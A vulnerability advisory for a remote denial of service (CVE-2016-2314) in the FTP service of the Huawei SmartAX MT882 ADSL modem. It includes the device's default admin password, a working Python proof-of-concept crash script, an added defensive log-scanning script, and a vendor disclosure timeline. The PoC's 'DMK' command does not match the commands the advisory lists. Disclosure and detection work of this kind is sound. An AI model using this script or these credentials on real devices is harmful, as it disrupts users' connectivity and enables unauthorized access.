- Topic: Denial of Service (DoS) vulnerability in Huawei SmartAX MT882 ADSL Modem.
- Class: Remote DoS.
- Severity: Medium.
- Date published: 2016-02-11
- Date of last update: 2016-02-11
- CVE number: CVE-2016-2314
- Credits: Déborah Valeria Higa
- Affects:
  - Product name: Huawei SmartAX MT882 ADSL Modem.
  - Affected version: V200R002B022 Arg
I. Background
The Huawei SmartAX MT882 includes a GlobespanVirata ftpd 1.0 (FTP) service on TCP port 21.
II. Problem Description
The FTP service fails when a client performs the following steps:
- Log in with USER and PASS.
- Receive response.
- Make a directory with MKD, using a directory name 0xFA characters long.
- Send another command that works with files and directories, such as CWD, RMD, XRMD, MKD, XMKD or DELE.
- Terminate command connection with QUIT.
- Receive response.
III. Impact
A remote attacker can log in with the default user (admin) and password (tomenague), follow the described steps and cause a DoS, suspending the operation of the device.
IV. Supporting Technical Details
Proof of concept:
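# Python 2 proof of concept
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('10.0.0.2', 21))
# Log in with USER and PASS, then read the response
s.send('USER admin\r\n')
s.send('PASS tomenague\r\n')
print s.recv(4096)
# MKD with a directory name of length 0xFA
s.send('MKD ' + 'A'*0xFA + '\r\n')
# Follow-up command sent after the long MKD
s.send('DMK A\r\n')
# Terminate the command connection and read the response
s.send('QUIT\r\n')
print s.recv(4096)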
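A defensive check for the command sequence described in section II, as an added example that is not part of the original advisory: it scans FTP control-channel log lines for an MKD/XMKD whose name is 0xFA or more characters long and records whether one of the listed follow-up commands came next. The `<session> <COMMAND> [argument]` log format, the `scan` function and the `>=` threshold are assumptions; the sample log is constructed.

```python
# Added example: flag FTP sessions matching the sequence in this advisory.
# Assumed log format: "<session> <COMMAND> [argument]" (hypothetical).
LONG_NAME = 0xFA                 # directory-name length given in the advisory
MAKE_DIR = {"MKD", "XMKD"}
# Follow-up commands listed in section II of the advisory.
FOLLOW_UP = {"CWD", "RMD", "XRMD", "MKD", "XMKD", "DELE"}


def scan(lines):
    """Return {session: finding} for sessions that sent an oversized MKD/XMKD."""
    findings = {}
    for raw in lines:
        parts = raw.rstrip("\r\n").split(" ", 2)
        if len(parts) < 2:
            continue             # malformed line, nothing to inspect
        session, verb = parts[0], parts[1].upper()
        arg = parts[2] if len(parts) == 3 else ""
        if session in findings and verb in FOLLOW_UP:
            # Long MKD already seen; a file/directory command followed it.
            findings[session] = "long-mkd+follow-up"
        elif verb in MAKE_DIR and len(arg) >= LONG_NAME:
            # Assumption: names longer than 0xFA are treated as suspicious too.
            findings.setdefault(session, "long-mkd")
    return findings


# Constructed sample log (not captured from a real device).
SAMPLE_LOG = [
    "s1 USER admin",
    "s1 PASS ****",
    "s1 MKD " + "A" * 0xFA,
    "s1 CWD A",
    "s1 QUIT",
    "s2 USER admin",
    "s2 MKD backups",
    "s2 CWD backups",
    "s3 MKD " + "B" * 300,
    "s3 QUIT",
]

if __name__ == "__main__":
    for session, finding in sorted(scan(SAMPLE_LOG).items()):
        print(session, finding)
```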
V. Report Timeline
- 2015-10-31: contact Huawei Product Security Incident Response Team (PSIRT) to inform them that two vulnerabilities have been found in the Huawei SmartAX MT882 ADSL Modem. Send a draft advisory with technical details and PoC files.
- 2015-11-01: Huawei PSIRT acknowledges reception of the advisory.
- 2015-11-11: Huawei PSIRT confirms the FTP vulnerability and asks for both PoCs and more information about the WHIP service.
- 2015-11-13: send requested information.
- 2015-11-16: Huawei PSIRT acknowledges.
- 2015-11-25: Huawei PSIRT informs that the warranty for the MT882 has expired, but confirms that the replacement product MT882a does not have the two vulnerabilities.
- 2015-11-25: inform that the MT882 product is still distributed by Argentina’s ISP Arnet.
- 2015-11-27: Huawei PSIRT acknowledges.
- 2016-01-15: request a status update.
- 2016-01-15: Huawei PSIRT informs that they have contacted Argentina’s front line, which has notified Arnet, but the customer didn’t give a result. Argentina’s front line will ask the customer again next week.
- 2016-01-22: Huawei PSIRT informs that Arnet uses HG532s as a replacement.
- 2016-01-23: contact to inform that the investigation is considered closed and ask for confirmation.
- 2016-01-25: Huawei PSIRT acknowledges.
- 2016-02-11: Security Advisory published.